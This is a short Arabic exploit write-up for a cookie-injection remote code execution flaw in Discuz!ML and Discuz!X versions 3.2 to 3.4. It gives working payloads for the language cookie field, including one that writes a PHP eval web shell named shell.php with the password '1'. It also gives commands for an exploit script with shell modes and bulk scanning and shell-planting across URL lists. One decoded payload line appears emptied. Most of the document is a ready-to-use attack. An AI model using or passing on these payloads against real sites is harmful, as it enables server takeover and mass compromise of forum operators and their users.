
الأنظمة والإصدارات المتأثرة:Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4
الأنظمة والإصدارات المتأثرة: Discuz!ML V3.2-3.4 وDiscuz!x V3.2-3.4 سبب الثغرة: لا يقوم نظام Discuz!ML بتصفية محتوى معامل language المُستلَم من الحقل l داخل ملف تعريف الارتباط (cookie)، مما يؤدي إلى تسلسل النصوص (string concatenation) وتنفيذ كود PHP.
يظهر حقل xxxx_xxxx_language ضمن حقول ملف تعريف الارتباط (cookie)، والسبب الجذري هو وجود حقن (injection) في هذا الحقل يؤدي إلى RCE.
التقط الحزم وابحث عن قيمة language في ملف تعريف الارتباط ثم عدّلها إلى
xxxx_xxxx_language=sc'.phpinfo().'
getshell
%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%253C%253Fphp%2520eval%2528%2524_POST%255B%25221%2522%255D%2529%253B%253F%253E%27%29%29.%27
القيمة الفعلية هي:
'.+file_put_contents('shell.php',urldecode('')).'
سيؤدي ذلك إلى إنشاء shell.php في المسار، وكلمة مرور الاتصال هي 1
============================================================================================================================================================== التحقق من وجود الثغرة
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php"
وضع cmdshell
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --cmdshell
وضع getshell
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --getshell
فحص جماعي
python dz-ml-rce.py -f urls.txt
getshell جماعي
python dz-ml-rce.py -f urls.txt --getshell